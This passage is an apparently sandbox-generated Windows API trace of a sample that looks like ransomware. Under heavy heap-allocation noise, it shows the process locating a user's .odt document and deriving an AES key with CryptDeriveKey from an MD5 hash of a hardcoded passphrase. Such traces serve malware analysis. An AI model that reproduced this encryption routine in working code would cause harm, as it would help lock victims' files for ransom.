hHeap=0x1780000) returned 1 [0079.319] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.319] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.321] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca5c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.322] CloseHandle (hObject=0x298) returned 1 [0079.322] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.322] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.322] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\hR3cojo6WftWpyW3h.odt", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4429be70, ftCreationTime.dwHighDateTime=0x1d5e0b0, ftLastAccessTime.dwLowDateTime=0x502b6580, ftLastAccessTime.dwHighDateTime=0x1d5e339, ftLastWriteTime.dwLowDateTime=0x502b6580, ftLastWriteTime.dwHighDateTime=0x1d5e339, nFileSizeHigh=0x0, nFileSizeLow=0xa840, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="hR3cojo6WftWpyW3h.odt", cAlternateFileName="HR3COJ~1.ODT")) returned 0x41ac500 [0079.322] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0079.323] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.323] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.323] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.323] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.323] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a41d8) returned 1 [0079.324] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.324] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.324] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.324] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.325] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cab20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.325] CryptCreateHash (in: hProv=0x41a41d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0079.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.325] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0079.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.325] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb018, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.325] CryptHashData (hHash=0x41ac500, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.326] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cafb8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.326] CryptDeriveKey (in: hProv=0x41a41d8, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0079.326] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.326] CryptDestroyHash (hHash=0x41ac500) returned 1 [0079.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0079.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0079.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0079.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0079.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0079.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.327] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.328] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0079.328] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0079.329] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.330] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.331] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.331] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.331] 